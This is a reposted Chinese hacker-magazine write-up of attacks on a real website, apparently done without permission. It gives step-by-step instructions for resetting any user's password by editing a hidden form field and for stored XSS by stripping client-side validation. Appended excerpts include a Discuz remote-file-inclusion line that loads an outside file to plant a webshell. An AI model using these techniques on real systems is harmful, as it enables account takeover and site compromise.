漏洞漫舞的飞骋

作者:玄猫[B.C.T]

网站:http://www.cnbct.org/&http://www.blackwoods.cn/

原件: http://www.cnbct.org/xuan1.doc

转载时,请注意版权,发于黑X2005年7期

一、前言。

初识飞骋似乎还是2002年,那时它推出了一个似乎叫飞骋邮局的东西,提供280M的空间(在当时算很大了),当时学SQL Injection的时候,曾用它练过手,现在这个站发展的不小,于是再对它作次安全检测吧,发现漏洞漫天飞舞啊,而且很有意思,整个网站哪个栏目的系统都是各有特色,有.net的,有php的,还有asp的,真不知道他们是多少个人一点一点拼着开发起来的,而且他们用什么样服务器,怪啊~其实由此就可以看到他们的技术不专业性。从检测的结果来看,漏洞出的都很幼稚,好了,捡我发现的一些比较典型的漏洞给大家逐个介绍下(注入的漏洞就不说了吧,因为猫猫懒得找注入点了,大家可以自己找找看,有很多的,但是错误提示是关闭的。),争取能包含大部分常见网站程序漏洞吧。

二、网站程序漏洞介绍。

玄猫的习惯是先从系统功能来看,这个地方出的漏洞一般都是比较危险的。

1、取回密码验证不严导致可以修改任意用户的密码漏洞。

人在江湖走,难免忘密码,找回密码功能当然是现在涉及会员管理的网络程序的”标配”了,但是找回密码功能容易出现一个大的纰漏就是验证不严,我们来看:

注册一个用户名为BlackCat的用户,然后点击首页的”忘记密码”按钮找回密码,看程序的流程,先是输入用户名,然后是填写提示问题的答案,然后就是修改密码了(读者:又一个用废话骗稿费的)。我们把这个第三步的页面保存下来,用UltraEdit打开看源代码,读到118行的时候,我们看到这样一行代码<input name="g_username" id="g_username" type="hidden" value="blackcats" />为了照顾不懂Html的读者,我讲下这段代码的含义,这是一个隐藏的文本域,值为blackcats,即我们要找回密码的用户名,因为隐藏域在网页上是不显示的,所以许多程序员都用它来传递参数,但是这里用这种方法就导致了一个极其严重的漏洞,为了方便讲解,我们再注册一个叫”BlackWoods”的用户,密码设为123456。注册成功后,我们来修改保存到本地的网页文件,把value=”blackcats”改为value=”BlackWoods”,然后把文件第93行的action="getpassword_2.aspx"改为action=" http://www.fc****.com/reg/ getpassword_2.aspx",打开这个网页,在输入新密码的地方输入654321,然后提交,显示修改成功,我们用123456的密码登陆用户BlackWoods会发现密码错误了,再用654321登陆,成功,这就是严重的由于验证不严导致的随意修改用户密码的漏洞。

再来看它提供的服务有哪些漏洞。

2、网络曰记内容跨站漏洞。

首先来看曰记服务,一般来说对于像曰记这种一个人写,N多人看的东东,我们要考虑的就是XSS跨站漏洞了,(千万不要小看跨站,我觉得辐射鱼在这方面颇有研究,他经常能提出除了盗cookies的更强的利用方法,譬如直接利用管理员的表单来进行一些操作,大家可以看看以前的杂志)。在下面的内容中,我们试着用代码<sc太阳pt>alert(“玄猫啊玄猫,玄猫要高考咯”)</sc太阳pt>来测试能不能在页面上运行我们的Javasc太阳pt脚本。

我们打开一个写曰记的页面,先测试内容能不能写跨站脚本,曰记标题随便写,内容写个<sc太阳pt>alert(“玄猫啊玄猫,玄猫要高考咯”)</sc太阳pt>,然后去看看,不难看到,我们写的sc太阳pt被替换成了s c太阳pt,(图一)

中间多了个空格,再来改变大小写试试,内容写<Sc太阳pt>alert(“玄猫啊玄猫,玄猫要高考咯”)</sc太阳pt>,还是不行,看来要想个变通的方法了,我们找找还有哪些是可以输出的,对了,标题,可是有的朋友会有疑问,标题就让写10个字,不够啊,我们再来把文件保存到本地,研究form的验证:232行有个<FORM id=frmAnnounce name=frmAnnounce onsubmit="return checkform();"的代码,不难看出,这个onsubmit触发的函数就是检查标题字数的代码,我们删掉onsubmit=”return checkform();”,然后把action补全,标题内填入<sc太阳pt>alert(“玄猫啊玄猫,玄猫要高考咯”)</sc太阳pt>,内容随便写些东西,提交,在随后刷新出的页面里,优雅得弹出了我们的对话框,跨站成功。(图二)

(0)

相关推荐

  • 漏洞漫舞的飞骋

    作者:玄猫[B.C.T] 网站:http://www.cnbct.org/&http://www.blackwoods.cn/ 原件: http://www.cnbct.org/xuan1.doc 转载时,请注意版权,发于黑X2005年7期 一.前言. 初识飞骋似乎还是2002年,那时它推出了一个似乎叫飞骋邮局的东西,提供280M的空间(在当时算很大了),当时学SQL Injection的时候,曾用它练过手,现在这个站发展的不小,于是再对它作次安全检测吧,发现漏洞漫天飞舞啊,而且很有意思,整个网

  • 爆强的300句经典山寨语录(全)

    1.上网不聊天,气死活神仙. 2. 做爱做的事,交配交的人. 3.后羿射日,嫦娥说:"没日不舒服!"于是最后一个太阳保住了- 4.床,钱,明月,光:衣,失地,上,爽! 5.不以风骚惊天下,就以淫荡动世人 6.鄙视我的人这么多,你算老几? 7.系统居然怀疑我灌水,我身边又没有水龙头.哦-明白了,身上有一个- 8.要挑熟女,裙子好揪. 9.我的大名叫上帝,小名叫耶稣,英文名god,法号是如来- 10.人生在世无非是让别人笑笑,偶尔笑笑别人. 11.万乐淫为首. 12.水能载舟,亦能煮粥!子

  • 最新奇迹私服复制漏洞大全含98C

    0.98版本漏洞=======★★★关于0.98c的复制方法★★★===== 复制必须要两个人,假如主角是A 对方是BA按ESC键 B交易A 交易两次 第二次交易要在第一次交易取消以后 等B交易完之后 A先点OK 再点取消 然后把要复制的东西放入仓库 接着A回来交易BB点OK A走开 复制成功 你会发现你放到仓库的东西又重新出现在你的包裹里 注意:不要把复制的东西和真品同时放在包裹或者仓库,不然后果不堪设想 不信你们自己可以试试 如果有人知道0.98c怎么刷卓越全属性装备请加我QQ8549128

  • 如何防范PowerShell代码注入漏洞绕过受限语言模式

    导语:受限语言模式是缓解PowerShell攻击的一种方式,能够阻止执行任意未签名的代码. 介绍 受限语言模式是缓解PowerShell攻击的一种方式,能够阻止执行任意未签名的代码.当Device Guard或者AppLocker处于强制模式时,它是最实际有效的强制安全措施,因为未被策略允许的任何脚本或者模块都位于受限语言模式下,这严重限制了攻击者执行未签名的代码.通过限制语言模式限制了Add-Type的调用.限制Add-Type明显是考虑到了它能编译并加载任意的C#代码到你的运行空间中去. 但

  • Oracle Database Server 'TNS Listener'远程数据投毒漏洞(CVE-2012-1675)的完美解决方法

    环境:Windows 2008 R2 + Oracle 10.2.0.3 应用最新bundle patch后,扫描依然报出漏洞 Oracle Database Server 'TNS Listener'远程数据投毒漏洞(CVE-2012-1675) •1.确定解决方案 •2.应用解决方案 •3.验证修补情况 •4.Reference 1.确定解决方案 安全厂家给出的解决办法: 链接:http://www.oracle.com/technetwork/topics/security/alert-c

  • 对错误,漏洞和exploits的说明

    作者:Mark Vogels  翻译:黯魂[S.S.T] 在这篇文档中,我将会试着为你提供一个对于错误,和由于那些错误而产生的漏洞以及它们的exploits的基本认识.那决不意味着能让你完全理解exploits和漏洞,但是能帮助你学会认识可能的漏洞以及怎样处理它们. 一般而言有3种不同类型的错误会可能危及计算机系统和网络的安全.  #编程错误  #配置错误  #设计错误 错误可以被看成是失误,尽管它们并非都是由事故导致的.软件/设备的最初创建者可能就存在错误,用最好的想法却创建了错误,并且没有意

  • OBLOG4.0 OBLOG4.5漏洞利用分析

    来源:Deepen Study 漏洞文件:js.asp <% Dim oblog set oblog=new class_sys oblog.autoupdate=False oblog.start dim js_blogurl,n js_blogurl=Trim(oblog.CacheConfig(3)) n=CInt(Request("n")) if n=0 then n=1 select case CInt(Request("j")) case 1 ca

  • discuz许愿池插件远程包含漏洞

    许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号. 这里xxxx.txt用CN.Tink的那个小马写个shell进去: <?copy

  • GBK字符编码(字符集)缺陷导致web安全漏洞

    GBK字符编码(字符集)缺陷导致web安全漏洞

    多字节编码由来 我们先来看看最常用的,最小字符集是ascii,对应的二级制可以表示为:00-7F 编码 .它也是我们计算机使用最早通用的字符集.前期几乎可以表示所有英文字符.后来,更多使用计算机国家加入后,我们就想在计算机中表示中文字符.我们知道常见中文就有7000多个字符.ascii码就只有128字符,只有0-127编码位置,远远不够用了.因此,我们就开始制作更大字符集,并且保证兼容ascii编码.要支持更多字符,选择更大字符集.我们只能用多个字节来描述一个字符了.为了很好的与ascii码,区

  • ASP的chr(0)文件上传漏洞原理和解决方法介绍

    我们在用ASP开发文件上传功能的时候,为了防止用户上传木马程序,常常会限制一些文件的上传,常用的方法是判断一下上传文件的扩展名是否符合规定,可以用right字符串函数取出上传文件的文件名的后四位,这样很容易就能判断了,但是这里面有一个漏洞,非常危险,就是chr(0)漏洞,详情请接着往下看. 一.首先解释下什么是chr(0)? 在ASP中可以用chr()函数调用ASCII码,其中chr(0)表示调用的是一个结束字符,简单的说当一个字符串中包含chr(0)字符时,只能输出chr(0)前面的字符,ch

随机推荐